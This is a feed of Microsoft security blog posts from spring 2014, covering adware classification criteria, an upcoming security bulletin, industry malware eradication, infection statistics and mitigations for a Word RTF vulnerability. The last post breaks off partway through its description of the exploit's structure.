href="/b/trustworthycomputing/archive/2014/04/07/adrienne-s-view-cloud-security-benefits-belie-pre-deployment-doubts.aspx">See more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/04/07/adrienne-s-view-cloud-security-benefits-belie-pre-deployment-doubts.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3626852&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">cloud securityAdrienne HallCloudSMBsSMBTrustcloud trust studyCloud Computingcloud servicesMicrosoftDatacomScorePrivacy Adware: A new approachhttp://blogs.technet.com/b/mmpc/archive/2014/04/03/adware-a-new-approach.aspxThu, 03 Apr 2014 20:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:e398809b-8c90-42bd-ae70-38c714970c05msft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/04/03/adware-a-new-approach.aspx#comments<div class="ExternalClassD02F60C1F6694AA4B3BC037B0EF737CC"> <p>​Here at the Microsoft Malware Protection Center (MMPC) we understand advertising is part of the modern computing experience. However, we want to give our customers choice and control regarding what happens with their computers. To that end we have recently undergone some changes to both the criteria we use to classify a program as adware and how we remediate it when we find it. This blog will help explain the new criteria and how it affects some programs.</p> <p>Our updated <a href="http://www.microsoft.com/security/portal/mmpc/shared/objectivecriteria.aspx">objective criteria</a> also explains how advertising software can provide users with&nbsp;choice and control. Programs that do not follow these rules will be detected as adware and immediately removed from the user&rsquo;s machine:</p> <blockquote> <p><em>Programs that promote a product or service outside of their own program can interfere with your computing experience. You should have clear choice and control when installing programs that open advertisements.</em></p> <p><em>The advertisements that are opened by these programs must:</em></p> <ul> <li> <div><em>Include an obvious way to close the ad.</em></div> </li> <li> <div><em>Include the name of the program that created the ad.</em></div> </li> </ul> <em></em> <p><em>The program that creates these advertisements must:</em></p> <ul> <li> <div><em>Provide a standard uninstall method for the program using the same name as shown in the ads it produces.</em></div> </li> </ul> </blockquote> <p>It is important that both developers and our customers understand this criteria. I will look at each of the points individually. But first, let&rsquo;s look at which programs can qualify as adware.</p> <h2>What can be classified as adware</h2> <p>We only consider classifying a program as adware if it runs on the user&rsquo;s machine and produces notifications promoting goods or services in programs other than itself. If the program shows advertisements within its own borders it will not be assessed any further.</p> <p>Many programs use advertising as a form of payment for the program and that is also an acceptable practice. We are more concerned with the advertising that interferes with our customer&rsquo;s Windows experience without giving them choice and control over it. To that end, programs that produce notifications promoting goods and services in programs other than themselves must adhere to the following rules:</p> <h3>A method to close the ad</h3> <p>As part of the advertisement there must be a method to close the ad. This must be a clear and obvious method. Suggested methods are an &lsquo;X&rsquo; or the word &lsquo;close&rsquo; in the corner of the ad.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/adware1.png"><img width="500" alt="Visible ads" src="http://www.microsoft.com/security/portal/blog-images/a/adware1.png" border="0" /></a>&nbsp;</p> <p><em>Figure 1: Our new objective criteria states that the ads must have a visible close button</em></p> <p>If you are going to have a group of ads, it is acceptable to have a single close button as long as the ads are clearly grouped together. If the ads are not grouped each ad will need its own close button. Some of the better groupings we have seen are lines around all of the ads or a different colour background for the ads.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/adware2.png"><img width="500" alt="Single close" src="http://www.microsoft.com/security/portal/blog-images/a/adware2.png" border="0" /></a>&nbsp;</p> <p><em>Figure 2: A single close button is acceptable for ads that are clearly grouped</em></p> <p>In the case of pop-up advertisements, a working close button on the window is acceptable.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/adware3.png"><img width="500" alt="Window close" src="http://www.microsoft.com/security/portal/blog-images/a/adware3.png" border="0" /></a>&nbsp;</p> <p><em>Figure 3: Pop-up ads must have a working window close button </em></p> <h3>The name of the program that is creating the ad</h3> <p>It is important for the user to know that these ads are being shown by a specific program and would not be there if it was not for this program. To tell the user that your program is making the ads, you need to make it clearly known in the advertisement. For example, some of the clearer ways that we see this done are phrases like &ldquo;Ads by &hellip;&rdquo;, &ldquo;&hellip; ads&rdquo;, &ldquo;Powered by &hellip;&rdquo;, &ldquo;This ad served &hellip;&rdquo;, or &ldquo;This ad is from &hellip;&rdquo;.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/adware4.png"><img width="500" alt="Ad identification" src="http://www.microsoft.com/security/portal/blog-images/a/adware4.png" border="0" /></a>&nbsp;</p> <p><em>Figure 4: Our new objective criteria states that the ads must clearly mention which program is producing the ads</em></p> <p>These methods all meet our updated objective criteria by clearly informing users which program is showing the ads. Using abbreviations or company logos alone are not considered clear enough. Also, only using &ldquo;Ads not by this site&rdquo; does not meet our criteria, because the user does not know which program created the ad.</p> <h3>A way to uninstall the program that is making the ads</h3> <p>The final part of giving a user choice and control is giving them a way to uninstall the program that is making the ads. For example, candidate programs that produce independent promotion notifications or promotion notifications in Internet Explorer must have an uninstall entry in the Windows control panel. It is very important that the name of the program in the uninstall entry exactly matches the name shown in the advertisement.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/adware5.png"><img width="500" alt="uninstall entry" src="http://www.microsoft.com/security/portal/blog-images/a/adware5.png" border="0" /></a>&nbsp;</p> <p><em>Figure 5: There must be an uninstall entry for the program producing the ads and the name in the entry must match that on the ads</em></p> <p>We know that for some browsers extensions are only removable through the browser&rsquo;s own controls. This is considered a standard uninstall method and meets our objective criteria as long as the name still matches the name in the ad.</p> <h2>What happens to detected adware</h2> <p>Currently, when our security products detect a program as adware they alert the user and offer them a recommended action. If they don&rsquo;t respond, the security product will let the program run until the user makes a decision.&nbsp;</p> <p>With our updated objective criteria, this is going to change. Now, when one of our products detects adware it will immediately stop the program and the user will be notified. The user then then has the ability to restore the program if they wish.</p> <h2>When is this going to happen?</h2> <p>Changes to our objective criteria for classifying adware will come into effect on July 1, 2014. This gives developers three months to comply with the new rules. </p> <p>We have already started reassessing our current adware detections against this new criteria. If your program is still being detected as adware but meets the new criteria you can let us know through the <a href="http://www.microsoft.com/security/portal/mmpc/vendor/resources.aspx">Developer Contact form</a>. </p> <p>We are very excited by all of these changes. We believe that it will make it easy for software developers to utilize advertising while at the same time empowering users to control their experience.</p> <p><em>Michael Johnson</em><br /><em>MMPC</em></p> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3626559&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> Advance Notification Service for the April 2014 Security Bulletin Releasehttp://blogs.technet.com/b/msrc/archive/2014/04/03/advance-notification-service-for-the-april-2014-security-bulletin-release.aspxThu, 03 Apr 2014 17:00:22 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:4255d489-07db-4fa8-a763-7c54d18d8a56Dustin C. Childs0<p><span style="font-size:medium;">Today we provide </span><a href="http://technet.microsoft.com/security/bulletin/MS14-apr"><span style="color:#0563c1;font-size:medium;">advance notification</span></a><span style="font-size:medium;"> for the release of four bulletins, two rated Critical and two rated Important in severity. These updates address issues in Microsoft Windows, Office and Internet Explorer.</span></p> <p><span style="font-size:medium;">The update provided through MS14-017 fully addresses the Microsoft Word issue first described in </span><a href="http://technet.microsoft.com/security/advisory/2953095"><span style="color:#0563c1;font-size:medium;">Security Advisory 2953095</span></a><span style="font-size:medium;">. This advisory also included a </span><a href="https://support.microsoft.com/kb/2953095"><span style="color:#0563c1;font-size:medium;">Fix it</span></a><span style="font-size:medium;"> to disable opening rich-text format (RTF) files within Microsoft Word. Once the security update is applied, you should disable the Fix it to ensure RTF files will again render normally. At this time, we are still only aware of limited, targeted attacks directed at Microsoft Word 2010. The update will fully address all affected versions.</span></p> <p><span style="font-size:medium;">This Tuesday&lsquo;s release will offer the last security updates made available for Windows XP and Office 2003. Both of these products go out of support on April 8, 2014. If you are unsure about the impact this may have on your environment, I recommend you read the recent </span><a href="http://blogs.technet.com/b/security/archive/2014/03/24/cyber-threats-to-windows-xp-and-guidance-for-small-businesses-and-individual-consumers.aspx"><span style="color:#0563c1;font-size:medium;">blog</span></a><span style="font-size:medium;"> from Trustworthy Computing&rsquo;s Tim Rains, which discusses some of the threats to Windows XP and provides guidance for small businesses and consumers.</span></p> <p><span style="font-size:medium;">As per our usual process, we&rsquo;ve scheduled the security bulletin release for the second Tuesday of the month, April 8, 2014, at approximately 10:00 a.m. PDT. Revisit this blog then for analysis of the risk and impact, as well as deployment guidance, together with a brief video overview of the month&rsquo;s updates. Until then, please review the <a title="ANS summary page" href="http://technet.microsoft.com/security/bulletin/MS14-apr"><span style="color:#0563c1;">ANS summary page</span></a> for more information to help you prepare for security bulletin testing and deployment.</span></p> <p><span style="font-size:medium;">Finally, you can stay on top of the MSRC team&rsquo;s recent activities by following us on Twitter at <a title="@MSFTSecResponse" href="https://twitter.com/msftsecresponse"><span style="color:#0563c1;">@MSFTSecResponse</span></a>.&nbsp;</span></p> <p><span style="font-size:medium;">Thank you,<br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs"><span style="color:#0563c1;">Dustin Childs</span></a></span><br /><span style="font-size:medium;"> Group Manager, Response Communications<br /> Microsoft Trustworthy Computing</span></p> <p></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3626472&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft WindowsSecurity AdvisoryANSInternet Explorer (IE)Microsoft Office The Next Leap Forward in Cyber Defense: Taking Action to Help Defeat Adversarieshttp://blogs.technet.com/b/msrc/archive/2014/04/02/the-next-leap-forward-in-cyber-defense-taking-action-to-help-defeat-adversaries.aspxWed, 02 Apr 2014 16:01:31 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:2b5197d0-d8ae-4e11-a48f-112c0b42c54aChris Betz0<p>It is often said that attackers have an advantage, because the defenders have to protect every part of their systems all the time, while the attacker only has to find one way in.</p> <p>This argument oversimplifies the security landscape and the real strength that defenders can achieve if they work together. While it&rsquo;s true that it is difficult to defend against an adversary that targets a single victim, this isn&rsquo;t the way most malicious actors work. It is easier and cheaper for malicious actors to reuse techniques, infrastructure and tools. Most malicious actors build capabilities that work across many targets and modify and reuse them.</p> <p>This is where the industry has the most opportunity to evolve. Industry collaboration and information sharing is part of the solution, but the real key is finding a way to coordinate <i>action</i>. When an attack targeting dozens, hundreds, or thousands of systems occurs, identifying a similar aspect of that attack can begin to unravel it everywhere. The fact that attackers use the same or similar methodologies in many places can actually put them at a disadvantage.</p> <p>Think of how different animals in the wild respond to attacks. Some respond as individuals and scatter in all directions. This allows predators to focus their attack on an individual and give chase. Yet this same attack unravels against animals who respond by forming a circle and standing their ground as a group. As long as they stick together, the predators are at a disadvantage &ndash; unable to separate and run down an individual.</p> <p>This kind of coordinated defense, and more crucially action, is the key to our industry taking the next big leap in the fight against cyber-attacks. It&rsquo;s not enough to share threat indicators such as yara signatures, IP addresses and malware hashes. What we really want to do is move defenders to take action that defends them and undermines an adversary&rsquo;s attack. As an industry, we have to come together and decide on a set of standards or principles by which we&rsquo;re going to not just share information, but use it.</p> <p>So why hasn&rsquo;t the industry moved towards actionable information sharing? In my opinion, we need to advance the current class of information sharing tools, processes, and technologies. Think of the Traffic Light Protocol. TLP tells us how sensitive the information is, and whether we can share it. What it doesn&rsquo;t say is whether it&rsquo;s ok to incorporate an IP address into a network defense system, or to ping the address, or to try and have the address taken down.</p> <p>As an industry, we must work to design and adopt technologies and programs that facilitate a two-way conversation and enable actionable information sharing. This should be the start of partnerships, not where things end. Our tools can no longer just be streams of after-the-fact data that flow from one place to another in varied forms and formats. Appropriate action needs to be part of the dialog, and part of us working together.</p> <p>Part of this transformation is happening today at <a href="http://technet.microsoft.com/en-us/security/dn467918"><span style="color:#0000ff;">Microsoft with our Microsoft Active Protections Program (MAPP)</span></a>. While MAPP initially started as an information-sharing effort amongst security vendors, it&rsquo;s moving to a place where it provides a set of guidance for defenders to protect themselves. To truly evolve to the next level, it will mean shifting from sharing information one way to taking coordinated action. The Microsoft Malware Protection Center (MMPC) has recently talked about the concept and called for a coordinated malware eradication approach at this <a href="http://blogs.technet.com/b/mmpc/archive/2014/01/27/industry-needs-to-work-together-to-eradicate-malware.aspx"><span style="color:#0000ff;">blog post</span></a>.</p> <p>When we get to that point, it won&rsquo;t just be security vendors who are working to keep everyone safe. It will be the networks, the service providers, the government entities, the retailers, the banks, all enterprises of the world pulling together and sharing actionable threat information necessary for defeating the adversaries &mdash; consistently and permanently.</p> <p>This will take a greater degree of trust than just information sharing. But to take that next big leap in enhancing our defense against cyber-attacks, it&rsquo;s where we must begin.</p> <p><a href="http://blogs.technet.com/b/msrc/about.aspx#Chris_Betz"><span style="color:#0000ff;">Chris Betz<br /></span></a>Senior Director<br />Microsoft Security Response Center (MSRC)</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3626463&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Announcementsrisk assessmentMicrosoft Active Protections Program (MAPP) Creating an intelligent “sandbox” for coordinated malware eradication http://blogs.technet.com/b/trustworthycomputing/archive/2014/03/31/creating-an-intelligent-sandbox-for-coordinated-malware-eradication.aspxMon, 31 Mar 2014 21:37:19 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:f85b52db-83c0-4255-90d4-994538aab60fTrusted Cloud Team0<p><strong>By TwC Staff</strong></p> <p>Antimalware companies have for some time used machine learning and big data analysis to detect and disrupt malware. But to move from disruption to eradication, the antimalware ecosystem must work with new types of partners in different ways.&nbsp; <a target="_blank" href="/b/trustworthycomputing/archive/2014/03/31/creating-an-intelligent-sandbox-for-coordinated-malware-eradication.aspx">Read more &gt;&gt; </a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/03/31/creating-an-intelligent-sandbox-for-coordinated-malware-eradication.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3626347&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">Cloudcyber threatsTrustBig DataITTechnologyCollective DefenseSecuritycyber securityTrustworthy ComputingMicrosoftDataexploitssecurity communityIT Pros United States’ Malware Infection Rate More than Doubles in the First Half of 2013http://blogs.technet.com/b/security/archive/2014/03/31/united-states-malware-infection-rate-more-than-doubles-in-the-first-half-of-2013.aspxMon, 31 Mar 2014 20:47:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:53fbb6f3-ba5e-457a-8f4e-b30f30c36ed2Tim Rains - Microsoft0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3626105http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3626105http://blogs.technet.com/b/security/archive/2014/03/31/united-states-malware-infection-rate-more-than-doubles-in-the-first-half-of-2013.aspx#comments<p>New data in the Microsoft Security Intelligence Report volume 15, indicates that the malware infection rate of the United States increased precipitously between the fourth quarter of 2012 and the first quarter of 2013.&nbsp; The <a href="http://www.microsoft.com/security/pc-security/malware-removal.aspx">Malicious Software Removal Tool </a>(MSRT) cleaned malware on 8.0 of every 1,000 computers scanned (<a href="http://www.microsoft.com/security/sir/glossary.aspx#C">Computers Cleaned per Mille or CCM</a>) in the US in the second quarter of 2013, compared to the worldwide average 5.8 in the same quarter. This was more than double the infection rate of the fourth quarter in 2012 of 3.3, as illustrated in Figures 1 and 2. With the exception of the third quarter of 2011, the US has enjoyed infections rates consistently below the worldwide average.&nbsp; The infection rate in the fourth quarter of 2012 was one of the lowest recorded CCMs for the US in the history of the Microsoft Security Intelligence Report.&nbsp;&nbsp; <br />&nbsp;<br />The percentage of systems that encountered threats in the US during this period increased only slightly from 13.4 percent in the fourth quarter of 2012 to 14.1 percent in the first quarter of 2013. This is well below the worldwide average encounter rate of 17.8 percent in in the first quarter of 2013. The encounter rate in the US decreased in the second quarter of 2013 to 11.5 percent, despite the malware infection rate remaining relatively high. <a href="/b/security/archive/2014/03/31/united-states-malware-infection-rate-more-than-doubles-in-the-first-half-of-2013.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/03/31/united-states-malware-infection-rate-more-than-doubles-in-the-first-half-of-2013.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3626105&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">United States Threat Landscape Creating an intelligent “sandbox” for coordinated malware eradication http://blogs.technet.com/b/mmpc/archive/2014/03/31/creating-an-intelligent-sandbox-for-coordinated-malware-eradication.aspxMon, 31 Mar 2014 18:30:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:cc90eae5-5a94-4903-bcb6-0d4c7ee237c3msft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/03/31/creating-an-intelligent-sandbox-for-coordinated-malware-eradication.aspx#comments<div class="ExternalClass99780ECCB68845069A8B4F80B91098D3"> <p class="ExternalClass1A433E56746040B7B5E7278CF5C87A21">​Hello from China where I am presenting on coordinated malware eradication at the <a href="http://www.pitci.com/2014/engs/index.html">2014 PC Security Labs Information Security Conference</a>.</p> <p class="ExternalClass1A433E56746040B7B5E7278CF5C87A21">Coordinated malware eradication was also the topic of <a href="http://blogs.technet.com/b/mmpc/archive/2014/01/27/industry-needs-to-work-together-to-eradicate-malware.aspx">my last blog</a>. I said the antimalware ecosystem must begin to work with new types of partners if we are going to move from the current state of uncoordinated malware <em>disruption</em>, to a state of coordinated malware <em>eradication</em>. Since then we&rsquo;ve been talking about these ideas at conferences around the world, including the recent RSA Conference in San Francisco, the Digital Crimes Consortium in Singapore, and the APCERT AGM &amp; Conference in Taipei. The level of engagement across the antimalware ecosystem has been high. Security and antivirus (AV) vendors, service providers, Computer Emergency Response Teams (CERTs), anti-fraud departments, and law enforcement have all joined the conversation, asking the essential questions about governance, communication channels, and benefits.</p> <p class="ExternalClass1A433E56746040B7B5E7278CF5C87A21">The overall theme of these discussions has been focused on how we can take the information we have and correlate it in new ways - a topic that lends itself to machine learning and big data analysis in the cloud. I believe this can be the most effective way to accelerate our malware eradication efforts. This proposes the next question: how do we create an intelligent &ldquo;sandbox&rdquo; where we can do this work?</p> <p class="ExternalClass1A433E56746040B7B5E7278CF5C87A21">For some time now, antimalware companies have been applying machine learning and big data analysis to generate more malware detections faster. Machine learning is all about training a machine to find patterns of signals in large streams of labeled information, then using those patterns against future data, all the while using feedback to continuously improve its accuracy. The stronger the labels, and the more diverse the information, the more effective the machine becomes.</p> <p class="ExternalClass1A433E56746040B7B5E7278CF5C87A21">Machine learning is similar to how I see people learn. For instance, when toddlers look at animals, at first they all appear to be the same. Then they learn to distinguish dogs from cows, for example. Pretty soon they can tell poodles from retrievers too. We correct them as necessary, and over many repetitions, they soon start to find more efficient identification patterns. In machine learning terms, we&rsquo;d say the toddlers were trained with labeled information. They extracted patterns of signals from the animals, and then applied these patterns against the new animals that&nbsp;they saw.</p> <p class="ExternalClass1A433E56746040B7B5E7278CF5C87A21">Humans do this intuitively and naturally, whereas machines require complex algorithms and training against huge data sets. Currently in the antimalware business, we have three main sources of machine learning signals: voluntarily opted-in telemetry data on encountered malware threats, our analysis of the malicious files, and malware signals from our partners.</p> <p class="ExternalClass1A433E56746040B7B5E7278CF5C87A21">To give you a sense of the volume and scale I am talking about, each month the Microsoft Malware Protection Center&rsquo;s (MMPC) machine learning systems analyze more than 30 million different file samples, and correlate this with what we know about the associated files, websites, and usage patterns. Our systems classify the file samples and then automatically create and deploy signatures for those identified as malware. The huge pipeline of signals makes it possible for us to quickly spot new malware. When we combine this with insights from our in-house AV researchers, our machines get smarter, and our customers receive greater protection.</p> <p class="ExternalClass1A433E56746040B7B5E7278CF5C87A21">We are using machine learning advances with the cloud too. For instance, we automatically recognize files showing tell-tale patterns of malicious intent. Cloud-based machines correlate that suspicious behavior with the reputation of the particular software being used to decide if AV software should intervene to block &ndash; faster, better, and more efficiently than a client computer could perform the check. In many cases we are able to protect clients even before detection signatures are delivered.</p> <p class="ExternalClass1A433E56746040B7B5E7278CF5C87A21">Although machine learning has already contributed significantly to malware protection, I believe that complete eradication of malware families will fail unless we determine how to identify specific attackers, and how to track a given malware family&rsquo;s malicious activity across its entire lifecycle. The AV industry needs to understand how a malware family is developed and distributed, how it is controlled, how it responds to changes, and how it is monetized.</p> <p class="ExternalClass1A433E56746040B7B5E7278CF5C87A21">To answer these questions, we&rsquo;ll need our machines to correlate more than telemetry, analysis, and the types of signals traditional security vendor partners provide. This is where coordinated malware eradication partnerships come into play. By working together and correlating our signals, we can see the bigger picture and identify appropriate choke points &ndash; weak spots for the malware writers.</p> <p class="ExternalClass1A433E56746040B7B5E7278CF5C87A21"><a href="http://www.microsoft.com/security/portal/blog-images/a/CME1.png"> <img style="width:500px;height:312px;" alt="Coordinated Malware Eradication" src="http://www.microsoft.com/security/portal/blog-images/a/CME1.png" border="0" /></a> <em></em>&nbsp;</p> <p class="ExternalClass1A433E56746040B7B5E7278CF5C87A21"><em>Figure 1: The antimalware ecosystem&rsquo;s coordinated malware eradication</em></p> <p class="ExternalClass1A433E56746040B7B5E7278CF5C87A21">The next question is where we will accomplish this goal. As I said above, we need a &ldquo;sandbox&rdquo; big enough where every industry partner can contribute with a variety of signals and deploy their machine learning and analysis tools. On top of our telemetry and analysis data, Microsoft can also contribute large amounts of cloud-based scalable storage and computing horsepower with the necessary big data analysis tools built-in. Our partners can contribute new information signals, strong labels, and their own tools to better train all of the machines.</p> <p class="ExternalClass1A433E56746040B7B5E7278CF5C87A21">For example, take your typical click-fraud attack. An advertising network can see the URLs being abused, the bank accounts in use, and the websites involved. A CERT or ISP can see parts of the command and control system &ndash; URLs, files being served, domain registrars, etc. AV vendors can see the client code and the URLs it is working with. Individually no one party has enough to identify the entirety of the attack. But when seen together, the correlation (in this example at least) is pretty easy to spot.</p> <p class="ExternalClass1A433E56746040B7B5E7278CF5C87A21"><a href="http://www.microsoft.com/security/portal/blog-images/a/CME3.png"> <img style="width:500px;height:233px;" alt="Coordinated Malware Eradication" src="http://www.microsoft.com/security/portal/blog-images/a/CME3.png" border="0" /></a> <em></em>&nbsp;</p> <p class="ExternalClass1A433E56746040B7B5E7278CF5C87A21"><em>Figure 2: Putting machine learning against massively correlated signals means we can go on the offensive </em></p> <p class="ExternalClass1A433E56746040B7B5E7278CF5C87A21">Putting machine learning to use at these huge scales against massively correlated signals means we can go on the offensive. Hopefully it will leave the bad guys with nowhere to go. It will allow us, as an industry, to blunt the efforts of the malware authors and their supply chains, and to block their attempts to game and steal from our customers.</p> <p class="ExternalClass1A433E56746040B7B5E7278CF5C87A21">I encourage you to join the conversation. We will be holding roundtable discussions at a few more upcoming events. The latest schedule is&nbsp;below.&nbsp; If you would like to attend a discussion, email us at <a href="mailto:cme-invite@microsoft.com">cme-invite@microsoft.com</a>.</p> <p class="ExternalClass1A433E56746040B7B5E7278CF5C87A21"><em>Dennis Batchelder</em><br /><em>Partner PM Manager </em><br /><em>MMPC</em></p> <h3 class="ExternalClass1A433E56746040B7B5E7278CF5C87A21">Upcoming roundtable discussions:</h3> <div class="ExternalClass1A433E56746040B7B5E7278CF5C87A21"> <ul> <li><strong>PC Security Labs Conference</strong>, 2014 - April 1, 2014 - April 2, 2014 Beijing, China</li> <li><strong>CARO Workshop</strong>, May 15, 2014 &ndash; May 16, 2014 Melbourne, FL</li> <li><strong>26th Annual FIRST Conference</strong>, June 22, 2014 &ndash; June 27, 2014 Boston, MA</li> <li><strong>Microsoft Security Research Alliance Summit</strong><br />July 22, 2014 &ndash; July 24, 2014 Seattle, WA<br /><em>Invite only. NDA required</em>.</li> </ul> </div> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3626259&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> Reflecting on Updated Privacy Practiceshttp://blogs.technet.com/b/trustworthycomputing/archive/2014/03/29/reflecting-on-updated-privacy-practices.aspxSat, 29 Mar 2014 17:07:36 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:6492b8d8-363a-45fa-8560-79de92e2034eTrusted Cloud Team0<p><strong>By Brendon Lynch, Chief Privacy Officer</strong></p> <p>For more than a decade, Microsoft has invested in a comprehensive privacy program that sets the foundation for our efforts to responsibly manage our customers&rsquo; data. An important part of our privacy commitment is that we evolve our policies and practices to address the changes in technology and customer expectations. Earlier today, <a href="/b/microsoft_on_the_issues/archive/2014/03/28/we-re-listening-additional-steps-to-protect-your-privacy.aspx">Microsoft General Counsel Brad Smith announced</a> a change to Microsoft&rsquo;s privacy practices to further enhance our privacy commitments.&nbsp; <a href="/b/trustworthycomputing/archive/2014/03/29/reflecting-on-updated-privacy-practices.aspx" target="_blank">Read more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/03/29/reflecting-on-updated-privacy-practices.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3626241&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">practicesTrustprivacy and reliabilityITMicrosoftDigital Citizenshippersonal dataDataPrivacy Security Advisory 2953095: recommendation to stay protected and for detectionshttp://blogs.technet.com/b/srd/archive/2014/03/24/security-advisory-2953095-recommendation-to-stay-protected-and-for-detections.aspxMon, 24 Mar 2014 19:01:24 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:231a64dc-9e55-4295-931c-09e4a6eb9801swiat0<p style="text-align:justify;">Today, Microsoft released <a href="http://technet.microsoft.com/en-us/security/advisory/2953095">Security Advisory 2953095</a> to notify customers of a vulnerability in Microsoft Word. At this time, we are aware of limited, targeted attacks directed at Microsoft Word 2010.</p> <p style="text-align:justify;">This blog will discuss mitigations and temporary defensive strategies that will help customers to protect themselves while we are working on a security update. This blog also provides some preliminary details of the exploit code observed in the wild.</p> <p style="text-align:justify;"><b>&nbsp;</b></p> <p style="text-align:justify;"><b>Mitigations and Workaround</b></p> <p style="text-align:justify;">The in the wild exploit takes advantage of an unspecified RTF parsing vulnerability combined with an ASLR bypass, which depends by a module loaded at predictable memory address.</p> <p style="text-align:justify;">First, our tests showed that EMET default configuration can block the exploits seen in the wild. In this case, EMET&rsquo;s mitigations such as &ldquo;Mandatory ASLR&rdquo; and anti-ROP features effectively stop the exploit. You can find more information about EMET at <span style="color:#0000ff;"><a href="http://www.microsoft.com/emet">http://www.microsoft.com/emet</a></span>. The exploit code seems to target Word 2010 and it deeply relies on the specific ASLR bypass mentioned. We were glad to see in our tests that this exploit fails (resulting in a crash) on machines running Word 2013, due to the <a href="http://blogs.technet.com/b/srd/archive/2014/03/12/when-aslr-makes-the-difference.aspx">ASLR enforcement introduced for this product</a>.</p> <p style="text-align:justify;">In addition to EMET mitigations, users may consider to apply stronger protections by blocking the root cause of the issue with one of the following suggested workarounds:</p> <ul style="text-align:justify;"> <li> <p>disable opening of RTF files;</p> </li> <li> <p>enforce Word to open RTF files always in <em>Protected View</em> in Trust Center settings.</p> </li> </ul> <p style="text-align:justify;">To facilitate deployment of the first workaround, we are providing a <a href="https://support.microsoft.com/kb/2953095">Fix it automated tool</a>. The Fix it uses Office&rsquo;s file block feature and adds few registry keys to prevent opening of RTF files in all Word versions. After the Fix it is installed, opening RTF file will result in the following message:</p> <p style="text-align:justify;"></p> <p><span style="font-family:Times New Roman;font-size:medium;"></span>&nbsp;<a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/3124.pic1.png"><img style="margin-right:auto;margin-left:auto;display:block;" alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/3124.pic1.png" border="0" /></a></p> <p style="text-align:justify;"><br /> If blocking RTF files is not an option, enterprise could enforce &ldquo;<em>Open selected file types in Protected View</em>&rdquo; instead of &ldquo;<em>Do not open selected file types</em>&rdquo; in Trust Center settings. The &ldquo;Protected View&rdquo; mode in Office 2010/2013 does not allow ActiveX controls to load. This will mitigate the attack we observed. Once the workaround is enabled, Word will prompt the <em>Protected View</em> gold bar, but will still allow the preview of the document.</p> <p style="text-align:justify;"></p> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/0118.pic2.png"><img style="margin-right:auto;margin-left:auto;display:block;" alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/0118.pic2.png" border="0" /></a></p> <p style="text-align:justify;"><br /> Enterprise admins may also consider to make their own custom protection using Trust Center features of Office instead of the Fix it, since these settings can be managed and deployed through GPO. For more details, please refer to: <span style="color:#0000ff;"><a href="http://office.microsoft.com/en-us/word-help/what-is-file-block-HA010355927.aspx#_File_Block_settings">http://office.microsoft.com/en-us/word-help/what-is-file-block-HA010355927.aspx#_File_Block_settings</a>.</span></p> <p style="text-align:justify;"><span style="color:#0000ff;">&nbsp;</span></p> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/1212.pic3.png"><img style="margin-right:auto;margin-left:auto;display:block;" alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/1212.pic3.png" border="0" /></a></p> <p style="text-align:justify;">&nbsp;</p> <p style="text-align:justify;"><b>Theoretical Outlook attack vector</b></p> <p style="text-align:justify;">There is a theoretical Outlook attack vector for RTF vulnerabilities through the preview pane. The reduced functionality of the preview pane makes this attack vector extremely hard to carry, and to date we have never seen exploits leveraging this mechanism.</p> <p style="text-align:justify;"><b>&nbsp;</b></p> <p style="text-align:justify;"><b>Technical details of the exploit</b></p> <p style="text-align:justify;">The attack detected in the wild is&nbsp;limited and very targeted in nature. The malicious document is designed to trigger a memory corruption vulnerability in the RTF parsing code. The attacker embedded a secondary component in order to bypass ASLR, and leveraged return-oriented-programming techniques using native RTF encoding schemes to craft ROP gadgets. The structure of the malicious document and the individual blocks is described in the picture 